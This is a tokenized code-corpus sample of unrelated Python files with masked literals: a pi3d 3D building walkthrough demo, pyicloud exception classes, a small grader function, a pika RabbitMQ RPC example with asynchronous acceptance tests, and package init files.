<s> from __future__ import absolute_import , division , print_function , unicode_literals <EOL> """<STR_LIT>""" <EOL> import math <EOL> import demo <EOL> import pi3d <EOL> DISPLAY = pi3d . Display . create ( x = <NUM_LIT> , y = <NUM_LIT> , background = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:1> ) ) <EOL> shader = pi3d . Shader ( "<STR_LIT>" ) <EOL> flatsh = pi3d . Shader ( "<STR_LIT>" ) <EOL> blockimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> roofedgeimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> roofimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> greenimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> ectex = pi3d . loadECfiles ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) <EOL> myecube = pi3d . EnvironmentCube ( size = <NUM_LIT> , maptype = "<STR_LIT>" ) <EOL> myecube . set_draw_details ( flatsh , ectex ) <EOL> mapwidth = <NUM_LIT> <EOL> mapdepth = <NUM_LIT> <EOL> mapheight = <NUM_LIT> <EOL> floorimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> bumpimg = pi3d . Texture ( "<STR_LIT>" ) <EOL> mymap = pi3d . ElevationMap ( mapfile = "<STR_LIT>" , <EOL> width = mapwidth , depth = mapdepth , height = mapheight , <EOL> divx = <NUM_LIT:64> , divy = <NUM_LIT:64> ) <EOL> mymap . set_draw_details ( shader , [ floorimg , bumpimg ] , <NUM_LIT> , <NUM_LIT:0.0> ) <EOL> mymap . set_fog ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> , <NUM_LIT> ) , <NUM_LIT> ) <EOL> pi3d . corridor ( <EOL> <NUM_LIT> , <NUM_LIT:10> , mymap , <EOL> details = [ shader , [ blockimg , blockimg ] , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , walls = "<STR_LIT>" ) <EOL> pi3d . corridor ( <EOL> <NUM_LIT> , - <NUM_LIT> , mymap , <EOL> details = [ shader , [ blockimg , blockimg ] , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , walls = "<STR_LIT>" ) <EOL> openSectionSchemeMultimodel = { <EOL> "<STR_LIT>" : <NUM_LIT:4> , <EOL> ( <NUM_LIT:0> , None ) : [ [ "<STR_LIT:R>" , <NUM_LIT:2> ] ] , <EOL> ( <NUM_LIT:2> , None ) : [ [ "<STR_LIT:C>" , <NUM_LIT:0> ] , [ "<STR_LIT:R>" , <NUM_LIT:2> ] ] , <EOL> ( <NUM_LIT:0> , <NUM_LIT:0> , "<STR_LIT>" ) : [ [ "<STR_LIT>" , <NUM_LIT:0> ] , [ "<STR_LIT>" , <NUM_LIT:3> ] ] , <EOL> ( <NUM_LIT:1> , <NUM_LIT:0> , "<STR_LIT>" ) : [ [ "<STR_LIT>" , <NUM_LIT:0> ] , [ "<STR_LIT>" , <NUM_LIT:3> ] ] , <EOL> ( <NUM_LIT:2> , <NUM_LIT:0> , "<STR_LIT>" ) : [ [ "<STR_LIT>" , <NUM_LIT:0> ] , [ "<STR_LIT>" , <NUM_LIT:3> ] ] , <EOL> ( <NUM_LIT:2> , <NUM_LIT:2> , "<STR_LIT>" ) : [ [ "<STR_LIT>" , <NUM_LIT:3> ] ] , <EOL> ( <NUM_LIT:2> , <NUM_LIT:0> ) : [ [ "<STR_LIT>" , <NUM_LIT:0> ] ] , <EOL> ( <NUM_LIT:1> , <NUM_LIT:0> ) : [ [ "<STR_LIT>" , <NUM_LIT:1> ] , [ "<STR_LIT>" , <NUM_LIT:3> ] ] , <EOL> ( <NUM_LIT:1> , <NUM_LIT:2> ) : [ [ "<STR_LIT>" , <NUM_LIT:3> ] ] } <EOL> details = [ <EOL> [ shader , [ blockimg , blockimg ] , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ shader , [ greenimg , greenimg ] , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ shader , [ roofimg , blockimg ] , <NUM_LIT:1.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> [ shader , [ roofedgeimg ] , <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ] , <EOL> ] <EOL> building = pi3d . Building ( <EOL> "<STR_LIT>" , <NUM_LIT:0> , <NUM_LIT:0> , mymap , <EOL> width = <NUM_LIT> , depth = <NUM_LIT> , height = <NUM_LIT> , name = "<STR_LIT>" , draw_details = details , <EOL> yoff = - <NUM_LIT> , scheme = openSectionSchemeMultimodel ) <EOL> outLight = pi3d . Light ( lightpos = ( <NUM_LIT:10> , - <NUM_LIT:10> , <NUM_LIT:20> ) , lightcol = ( <NUM_LIT:1.0> , <NUM_LIT:1.0> , <NUM_LIT> ) , lightamb = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> inLight = pi3d . Light ( lightpos = ( <NUM_LIT:10> , - <NUM_LIT:10> , <NUM_LIT:20> ) , lightcol = ( <NUM_LIT:0.1> , <NUM_LIT:0.1> , <NUM_LIT> ) , lightamb = ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.1> ) ) <EOL> for b in building . model : <EOL> b . set_light ( inLight , <NUM_LIT:0> ) <EOL> mymap . set_light ( inLight , <NUM_LIT:0> ) <EOL> inFlag = True <EOL> scshots = <NUM_LIT:1> <EOL> rot = <NUM_LIT:0.0> <EOL> tilt = <NUM_LIT:0.0> <EOL> avhgt = <NUM_LIT> <EOL> aveyelevel = <NUM_LIT> <EOL> aveyeleveladjust = aveyelevel - avhgt / <NUM_LIT:2> <EOL> man = pi3d . SolidObject ( <EOL> "<STR_LIT>" , pi3d . Size ( <NUM_LIT:1> , avhgt , <NUM_LIT:1> ) , <EOL> pi3d . Position ( <NUM_LIT:0> , ( mymap . calcHeight ( <NUM_LIT:5> , <NUM_LIT:5> ) + avhgt / <NUM_LIT:2> ) , <NUM_LIT:0> ) , <NUM_LIT:1> ) <EOL> inputs = pi3d . InputEvents ( ) <EOL> inputs . get_mouse_movement ( ) <EOL> mouseOn = True <EOL> frame = <NUM_LIT> <EOL> record = False <EOL> CAMERA = pi3d . Camera . instance ( ) <EOL> while DISPLAY . loop_running ( ) and not inputs . key_state ( "<STR_LIT>" ) : <EOL> CAMERA . reset ( ) <EOL> CAMERA . rotate ( tilt , rot , <NUM_LIT:0> ) <EOL> CAMERA . position ( ( man . x ( ) , man . y ( ) , man . z ( ) - aveyeleveladjust ) ) <EOL> myecube . position ( man . x ( ) , man . y ( ) , man . z ( ) - aveyeleveladjust ) <EOL> pi3d . SolidObject . drawall ( ) <EOL> building . drawAll ( ) <EOL> mymap . draw ( ) <EOL> myecube . draw ( ) <EOL> inputs . do_input_events ( ) <EOL> """<STR_LIT>""" <EOL> mx , my , mv , mh , md = inputs . get_mouse_movement ( ) <EOL> rot -= ( mx ) * <NUM_LIT> <EOL> tilt -= ( my ) * <NUM_LIT> <EOL> jrx , jry = inputs . get_joystickR ( ) <EOL> if abs ( jrx ) > <NUM_LIT:0.1> : <EOL> rot -= jrx * <NUM_LIT:3> <EOL> if abs ( jry ) > <NUM_LIT:0.1> : <EOL> tilt -= jry * <NUM_LIT:3> <EOL> xm = man . x ( ) <EOL> ym = man . y ( ) <EOL> zm = man . z ( ) <EOL> jx , jy = inputs . get_joystick ( ) <EOL> if abs ( jy ) > <NUM_LIT> : <EOL> xm += math . sin ( math . radians ( rot ) ) * jy <EOL> zm -= math . cos ( math . radians ( rot ) ) * jy <EOL> if abs ( jx ) > <NUM_LIT> : <EOL> xm -= math . sin ( math . radians ( rot - <NUM_LIT> ) ) * jx <EOL> zm += math . cos ( math . radians ( rot - <NUM_LIT> ) ) * jx <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> xm -= math . sin ( math . radians ( rot ) ) <EOL> zm += math . cos ( math . radians ( rot ) ) <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> xm -= math . sin ( math . radians ( rot ) ) <EOL> zm += math . cos ( math . radians ( rot ) ) <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> xm += math . sin ( math . radians ( rot ) ) <EOL> zm -= math . cos ( math . radians ( rot ) ) <EOL> ym = ( mymap . calcHeight ( xm , zm ) + avhgt ) <EOL> NewPos = pi3d . Position ( xm , ym , zm ) <EOL> collisions = man . CollisionList ( NewPos ) <EOL> if not collisions : <EOL> man . move ( NewPos ) <EOL> if inFlag and abs ( man . z ( ) - building . zpos ) > <NUM_LIT> : <EOL> inFlag = False <EOL> for b in building . model : <EOL> b . set_light ( outLight , <NUM_LIT:0> ) <EOL> mymap . set_light ( outLight , <NUM_LIT:0> ) <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> tilt -= <NUM_LIT> <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> tilt += <NUM_LIT> <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> rot += <NUM_LIT:2> <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> rot -= <NUM_LIT:2> <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> while inputs . key_state ( "<STR_LIT>" ) : <EOL> inputs . do_input_events ( ) <EOL> pi3d . screenshot ( "<STR_LIT>" + str ( scshots ) + "<STR_LIT>" ) <EOL> scshots += <NUM_LIT:1> <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> mc = <NUM_LIT:0> <EOL> if inputs . key_state ( "<STR_LIT>" ) : <EOL> while inputs . key_state ( "<STR_LIT>" ) : <EOL> inputs . do_input_events ( ) <EOL> mouseOn != mouseOn <EOL> inputs . grab_by_type ( "<STR_LIT>" , grab = mouseOn ) <EOL> inputs . release ( ) <EOL> DISPLAY . destroy ( ) </s>
<s> class PyiCloudException ( Exception ) : <EOL> pass <EOL> class PyiCloudNoDevicesException ( PyiCloudException ) : <EOL> pass <EOL> class PyiCloudAPIResponseError ( PyiCloudException ) : <EOL> def __init__ ( self , reason , code ) : <EOL> self . reason = reason <EOL> self . code = code <EOL> message = reason <EOL> if code : <EOL> message += "<STR_LIT>" % code <EOL> super ( PyiCloudAPIResponseError , self ) . __init__ ( message ) <EOL> class PyiCloudFailedLoginException ( PyiCloudException ) : <EOL> pass <EOL> class PyiCloud2FARequiredError ( PyiCloudException ) : <EOL> def __init__ ( self , url ) : <EOL> message = "<STR_LIT>" % url <EOL> super ( PyiCloud2FARequiredError , self ) . __init__ ( message ) <EOL> class PyiCloudNoDevicesException ( Exception ) : <EOL> pass <EOL> class NoStoredPasswordAvailable ( PyiCloudException ) : <EOL> pass <EOL> class PyiCloudBinaryFeedParseError ( Exception ) : <EOL> pass <EOL> class PyiCloudPhotoLibraryNotActivatedErrror ( Exception ) : <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> def grade ( autogen , key ) : <EOL> if '<STR_LIT>' in key : <EOL> return ( True , '<STR_LIT>' ) <EOL> else : <EOL> return ( False , '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import pika <EOL> SERVER_QUEUE = '<STR_LIT>' <EOL> def main ( ) : <EOL> """<STR_LIT>""" <EOL> with pika . BlockingConnection ( ) as conn : <EOL> channel = conn . channel ( ) <EOL> channel . queue_declare ( queue = SERVER_QUEUE , <EOL> exclusive = True , <EOL> auto_delete = True ) <EOL> channel . basic_consume ( on_server_rx_rpc_request , queue = SERVER_QUEUE ) <EOL> channel . basic_consume ( on_client_rx_reply_from_server , <EOL> queue = '<STR_LIT>' , <EOL> no_ack = True ) <EOL> channel . basic_publish ( <EOL> exchange = '<STR_LIT>' , <EOL> routing_key = SERVER_QUEUE , <EOL> body = '<STR_LIT>' , <EOL> properties = pika . BasicProperties ( reply_to = '<STR_LIT>' ) ) <EOL> channel . start_consuming ( ) <EOL> def on_server_rx_rpc_request ( ch , method_frame , properties , body ) : <EOL> print '<STR_LIT>' , body <EOL> ch . basic_publish ( '<STR_LIT>' , routing_key = properties . reply_to , body = '<STR_LIT>' ) <EOL> ch . basic_ack ( delivery_tag = method_frame . delivery_tag ) <EOL> print '<STR_LIT>' <EOL> def on_client_rx_reply_from_server ( ch , method_frame , properties , body ) : <EOL> print '<STR_LIT>' , body <EOL> print '<STR_LIT>' <EOL> ch . close ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import time <EOL> import uuid <EOL> from pika import spec <EOL> from pika . compat import as_bytes <EOL> import pika . connection <EOL> import pika . frame <EOL> import pika . spec <EOL> from async_test_base import ( AsyncTestCase , BoundQueueTestCase , AsyncAdapters ) <EOL> class TestA_Connect ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> self . stop ( ) <EOL> class TestConfirmSelect ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> channel . _on_selectok = self . on_complete <EOL> channel . confirm_delivery ( ) <EOL> def on_complete ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Confirm . SelectOk ) <EOL> self . stop ( ) <EOL> class TestBlockingNonBlockingBlockingRPCWontStall ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def begin ( self , channel ) : <EOL> self . _expected_queue_params = ( <EOL> ( "<STR_LIT>" + uuid . uuid1 ( ) . hex , False ) , <EOL> ( "<STR_LIT>" + uuid . uuid1 ( ) . hex , True ) , <EOL> ( "<STR_LIT>" + uuid . uuid1 ( ) . hex , False ) <EOL> ) <EOL> self . _declared_queue_names = [ ] <EOL> for queue , nowait in self . _expected_queue_params : <EOL> channel . queue_declare ( callback = self . _queue_declare_ok_cb <EOL> if not nowait else None , <EOL> queue = queue , <EOL> auto_delete = True , <EOL> nowait = nowait , <EOL> arguments = { '<STR_LIT>' : self . TIMEOUT * <NUM_LIT:1000> } ) <EOL> def _queue_declare_ok_cb ( self , declare_ok_frame ) : <EOL> self . _declared_queue_names . append ( declare_ok_frame . method . queue ) <EOL> if len ( self . _declared_queue_names ) == <NUM_LIT:2> : <EOL> self . channel . queue_declare ( callback = self . _queue_declare_ok_cb , <EOL> queue = self . _expected_queue_params [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] , <EOL> passive = True , <EOL> nowait = False ) <EOL> elif len ( self . _declared_queue_names ) == <NUM_LIT:3> : <EOL> self . assertSequenceEqual ( <EOL> sorted ( self . _declared_queue_names ) , <EOL> sorted ( item [ <NUM_LIT:0> ] for item in self . _expected_queue_params ) ) <EOL> self . stop ( ) <EOL> class TestConsumeCancel ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> self . queue_name = self . __class__ . __name__ + '<STR_LIT::>' + uuid . uuid1 ( ) . hex <EOL> channel . queue_declare ( self . on_queue_declared , queue = self . queue_name ) <EOL> def on_queue_declared ( self , frame ) : <EOL> for i in range ( <NUM_LIT:0> , <NUM_LIT:100> ) : <EOL> msg_body = '<STR_LIT>' . format ( self . __class__ . __name__ , i , <EOL> time . time ( ) ) <EOL> self . channel . basic_publish ( '<STR_LIT>' , self . queue_name , msg_body ) <EOL> self . ctag = self . channel . basic_consume ( self . on_message , <EOL> queue = self . queue_name , <EOL> no_ack = True ) <EOL> def on_message ( self , _channel , _frame , _header , body ) : <EOL> self . channel . basic_cancel ( self . on_cancel , self . ctag ) <EOL> def on_cancel ( self , _frame ) : <EOL> self . channel . queue_delete ( self . on_deleted , self . queue_name ) <EOL> def on_deleted ( self , _frame ) : <EOL> self . stop ( ) <EOL> class TestExchangeDeclareAndDelete ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> X_TYPE = '<STR_LIT>' <EOL> def begin ( self , channel ) : <EOL> self . name = self . __class__ . __name__ + '<STR_LIT::>' + uuid . uuid1 ( ) . hex <EOL> channel . exchange_declare ( self . on_exchange_declared , self . name , <EOL> exchange_type = self . X_TYPE , <EOL> passive = False , <EOL> durable = False , <EOL> auto_delete = True ) <EOL> def on_exchange_declared ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Exchange . DeclareOk ) <EOL> self . channel . exchange_delete ( self . on_exchange_delete , self . name ) <EOL> def on_exchange_delete ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Exchange . DeleteOk ) <EOL> self . stop ( ) <EOL> class TestExchangeRedeclareWithDifferentValues ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> X_TYPE1 = '<STR_LIT>' <EOL> X_TYPE2 = '<STR_LIT>' <EOL> def begin ( self , channel ) : <EOL> self . name = self . __class__ . __name__ + '<STR_LIT::>' + uuid . uuid1 ( ) . hex <EOL> self . channel . add_on_close_callback ( self . on_channel_closed ) <EOL> channel . exchange_declare ( self . on_exchange_declared , self . name , <EOL> exchange_type = self . X_TYPE1 , <EOL> passive = False , <EOL> durable = False , <EOL> auto_delete = True ) <EOL> def on_cleanup_channel ( self , channel ) : <EOL> channel . exchange_delete ( None , self . name , nowait = True ) <EOL> self . stop ( ) <EOL> def on_channel_closed ( self , channel , reply_code , reply_text ) : <EOL> self . connection . channel ( self . on_cleanup_channel ) <EOL> def on_exchange_declared ( self , frame ) : <EOL> self . channel . exchange_declare ( self . on_bad_result , self . name , <EOL> exchange_type = self . X_TYPE2 , <EOL> passive = False , <EOL> durable = False , <EOL> auto_delete = True ) <EOL> def on_bad_result ( self , frame ) : <EOL> self . channel . exchange_delete ( None , self . name , nowait = True ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> class TestQueueDeclareAndDelete ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> channel . queue_declare ( self . on_queue_declared , <EOL> passive = False , <EOL> durable = False , <EOL> exclusive = True , <EOL> auto_delete = False , <EOL> nowait = False , <EOL> arguments = { '<STR_LIT>' : self . TIMEOUT * <NUM_LIT:1000> } ) <EOL> def on_queue_declared ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Queue . DeclareOk ) <EOL> self . channel . queue_delete ( self . on_queue_delete , frame . method . queue ) <EOL> def on_queue_delete ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Queue . DeleteOk ) <EOL> self . stop ( ) <EOL> class TestQueueNameDeclareAndDelete ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> self . _q_name = self . __class__ . __name__ + '<STR_LIT::>' + uuid . uuid1 ( ) . hex <EOL> channel . queue_declare ( self . on_queue_declared , self . _q_name , <EOL> passive = False , <EOL> durable = False , <EOL> exclusive = True , <EOL> auto_delete = True , <EOL> nowait = False , <EOL> arguments = { '<STR_LIT>' : self . TIMEOUT * <NUM_LIT:1000> } ) <EOL> def on_queue_declared ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Queue . DeclareOk ) <EOL> self . assertEqual ( frame . method . queue , self . _q_name ) <EOL> self . channel . queue_delete ( self . on_queue_delete , frame . method . queue ) <EOL> def on_queue_delete ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Queue . DeleteOk ) <EOL> self . stop ( ) <EOL> class TestQueueRedeclareWithDifferentValues ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> self . _q_name = self . __class__ . __name__ + '<STR_LIT::>' + uuid . uuid1 ( ) . hex <EOL> self . channel . add_on_close_callback ( self . on_channel_closed ) <EOL> channel . queue_declare ( self . on_queue_declared , self . _q_name , <EOL> passive = False , <EOL> durable = False , <EOL> exclusive = True , <EOL> auto_delete = True , <EOL> nowait = False , <EOL> arguments = { '<STR_LIT>' : self . TIMEOUT * <NUM_LIT:1000> } ) <EOL> def on_channel_closed ( self , channel , reply_code , reply_text ) : <EOL> self . stop ( ) <EOL> def on_queue_declared ( self , frame ) : <EOL> self . channel . queue_declare ( self . on_bad_result , self . _q_name , <EOL> passive = False , <EOL> durable = True , <EOL> exclusive = False , <EOL> auto_delete = True , <EOL> nowait = False , <EOL> arguments = { '<STR_LIT>' : self . TIMEOUT * <NUM_LIT:1000> } ) <EOL> def on_bad_result ( self , frame ) : <EOL> self . channel . queue_delete ( None , self . _q_name , nowait = True ) <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> class TestTX1_Select ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> channel . tx_select ( self . on_complete ) <EOL> def on_complete ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Tx . SelectOk ) <EOL> self . stop ( ) <EOL> class TestTX2_Commit ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> channel . tx_select ( self . on_selectok ) <EOL> def on_selectok ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Tx . SelectOk ) <EOL> self . channel . tx_commit ( self . on_commitok ) <EOL> def on_commitok ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Tx . CommitOk ) <EOL> self . stop ( ) <EOL> class TestTX2_CommitFailure ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> self . channel . add_on_close_callback ( self . on_channel_closed ) <EOL> self . channel . tx_commit ( self . on_commitok ) <EOL> def on_channel_closed ( self , channel , reply_code , reply_text ) : <EOL> self . stop ( ) <EOL> def on_selectok ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Tx . SelectOk ) <EOL> @ staticmethod <EOL> def on_commitok ( frame ) : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> class TestTX3_Rollback ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> channel . tx_select ( self . on_selectok ) <EOL> def on_selectok ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Tx . SelectOk ) <EOL> self . channel . tx_rollback ( self . on_rollbackok ) <EOL> def on_rollbackok ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Tx . RollbackOk ) <EOL> self . stop ( ) <EOL> class TestTX3_RollbackFailure ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def begin ( self , channel ) : <EOL> self . channel . add_on_close_callback ( self . on_channel_closed ) <EOL> self . channel . tx_rollback ( self . on_commitok ) <EOL> def on_channel_closed ( self , channel , reply_code , reply_text ) : <EOL> self . stop ( ) <EOL> @ staticmethod <EOL> def on_commitok ( frame ) : <EOL> raise AssertionError ( "<STR_LIT>" ) <EOL> class TestZ_PublishAndConsume ( BoundQueueTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def on_ready ( self , frame ) : <EOL> self . ctag = self . channel . basic_consume ( self . on_message , self . queue ) <EOL> self . msg_body = "<STR_LIT>" % ( self . __class__ . __name__ , time . time ( ) ) <EOL> self . channel . basic_publish ( self . exchange , self . routing_key , <EOL> self . msg_body ) <EOL> def on_cancelled ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Basic . CancelOk ) <EOL> self . stop ( ) <EOL> def on_message ( self , channel , method , header , body ) : <EOL> self . assertIsInstance ( method , spec . Basic . Deliver ) <EOL> self . assertEqual ( body , as_bytes ( self . msg_body ) ) <EOL> self . channel . basic_ack ( method . delivery_tag ) <EOL> self . channel . basic_cancel ( self . on_cancelled , self . ctag ) <EOL> class TestZ_PublishAndConsumeBig ( BoundQueueTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> @ staticmethod <EOL> def _get_msg_body ( ) : <EOL> return '<STR_LIT:\n>' . join ( [ "<STR_LIT:%s>" % i for i in range ( <NUM_LIT:0> , <NUM_LIT> ) ] ) <EOL> def on_ready ( self , frame ) : <EOL> self . ctag = self . channel . basic_consume ( self . on_message , self . queue ) <EOL> self . msg_body = self . _get_msg_body ( ) <EOL> self . channel . basic_publish ( self . exchange , self . routing_key , <EOL> self . msg_body ) <EOL> def on_cancelled ( self , frame ) : <EOL> self . assertIsInstance ( frame . method , spec . Basic . CancelOk ) <EOL> self . stop ( ) <EOL> def on_message ( self , channel , method , header , body ) : <EOL> self . assertIsInstance ( method , spec . Basic . Deliver ) <EOL> self . assertEqual ( body , as_bytes ( self . msg_body ) ) <EOL> self . channel . basic_ack ( method . delivery_tag ) <EOL> self . channel . basic_cancel ( self . on_cancelled , self . ctag ) <EOL> class TestZ_PublishAndGet ( BoundQueueTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def on_ready ( self , frame ) : <EOL> self . msg_body = "<STR_LIT>" % ( self . __class__ . __name__ , time . time ( ) ) <EOL> self . channel . basic_publish ( self . exchange , self . routing_key , <EOL> self . msg_body ) <EOL> self . channel . basic_get ( self . on_get , self . queue ) <EOL> def on_get ( self , channel , method , header , body ) : <EOL> self . assertIsInstance ( method , spec . Basic . GetOk ) <EOL> self . assertEqual ( body , as_bytes ( self . msg_body ) ) <EOL> self . channel . basic_ack ( method . delivery_tag ) <EOL> self . stop ( ) <EOL> class TestZ_AccessDenied ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def start ( self , * args , ** kwargs ) : <EOL> self . parameters . virtual_host = str ( uuid . uuid4 ( ) ) <EOL> self . error_captured = False <EOL> super ( TestZ_AccessDenied , self ) . start ( * args , ** kwargs ) <EOL> self . assertTrue ( self . error_captured ) <EOL> def on_open_error ( self , connection , error ) : <EOL> self . error_captured = True <EOL> self . stop ( ) <EOL> def on_open ( self , connection ) : <EOL> super ( TestZ_AccessDenied , self ) . on_open ( connection ) <EOL> self . stop ( ) <EOL> class TestBlockedConnectionTimesOut ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def start ( self , * args , ** kwargs ) : <EOL> self . parameters . blocked_connection_timeout = <NUM_LIT> <EOL> self . on_closed_pair = None <EOL> super ( TestBlockedConnectionTimesOut , self ) . start ( * args , ** kwargs ) <EOL> self . assertEqual ( <EOL> self . on_closed_pair , <EOL> ( pika . connection . InternalCloseReasons . BLOCKED_CONNECTION_TIMEOUT , <EOL> '<STR_LIT>' ) ) <EOL> def begin ( self , channel ) : <EOL> channel . connection . _on_connection_blocked ( pika . frame . Method ( <EOL> <NUM_LIT:0> , <EOL> pika . spec . Connection . Blocked ( '<STR_LIT>' ) ) ) <EOL> def on_closed ( self , connection , reply_code , reply_text ) : <EOL> """<STR_LIT>""" <EOL> self . on_closed_pair = ( reply_code , reply_text ) <EOL> super ( TestBlockedConnectionTimesOut , self ) . on_closed ( connection , <EOL> reply_code , <EOL> reply_text ) <EOL> class TestBlockedConnectionUnblocks ( AsyncTestCase , AsyncAdapters ) : <EOL> DESCRIPTION = "<STR_LIT>" <EOL> def start ( self , * args , ** kwargs ) : <EOL> self . parameters . blocked_connection_timeout = <NUM_LIT> <EOL> self . on_closed_pair = None <EOL> super ( TestBlockedConnectionUnblocks , self ) . start ( * args , ** kwargs ) <EOL> self . assertEqual ( <EOL> self . on_closed_pair , <EOL> ( <NUM_LIT:200> , '<STR_LIT>' ) ) <EOL> def begin ( self , channel ) : <EOL> channel . connection . _on_connection_blocked ( pika . frame . Method ( <EOL> <NUM_LIT:0> , <EOL> pika . spec . Connection . Blocked ( <EOL> '<STR_LIT>' ) ) ) <EOL> channel . connection . _on_connection_unblocked ( pika . frame . Method ( <EOL> <NUM_LIT:0> , <EOL> pika . spec . Connection . Unblocked ( ) ) ) <EOL> channel . connection . add_timeout ( <NUM_LIT> , self . on_cleanup_timer ) <EOL> def on_cleanup_timer ( self ) : <EOL> self . stop ( ) <EOL> def on_closed ( self , connection , reply_code , reply_text ) : <EOL> """<STR_LIT>""" <EOL> self . on_closed_pair = ( reply_code , reply_text ) <EOL> super ( TestBlockedConnectionUnblocks , self ) . on_closed ( connection , <EOL> reply_code , <EOL> reply_text ) </s>
<s> from . errors import APIError <EOL> from . auth import Credentials <EOL> from . hub import Hub <EOL> import conf </s>
<s> '''<STR_LIT>''' <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> from . service import OAuth1Service , OAuth2Service , OflyService <EOL> from . session import OAuth1Session , OAuth2Session , OflySession <EOL> from . __about__ import ( __title__ , __version_info__ , __version__ , __author__ , <EOL> __license__ , __copyright__ ) <EOL> ( __title__ , __version_info__ , __version__ , __author__ , __license__ , <EOL> __copyright__ ) </s>
